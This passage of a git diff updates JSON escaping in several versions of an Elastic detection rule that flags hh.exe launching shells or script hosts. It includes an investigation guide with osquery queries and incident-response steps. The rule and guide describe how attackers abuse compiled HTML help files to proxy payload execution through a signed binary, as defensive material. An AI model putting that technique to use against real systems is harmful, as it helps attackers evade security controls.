LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json index 1832175f192..dd5e6ed30d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_106.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json index b4dd9fc6bed..89bdc786b45 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_107.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"hh.exe\" and\n process.name : (\"mshta.exe\", \"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"cscript.exe\", \"wscript.exe\")\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "e3343ab9-4245-4715-b344-e11c56b0a47f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json index 643241c7faf..02686393cec 100644 --- a/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/e3343ab9-4245-4715-b344-e11c56b0a47f_108.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Process Activity via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Process Activity via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate the parent process to gain understanding of what triggered this behavior.\n - Retrieve `.chm`, `.ps1`, and other files that were involved to further examination.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised 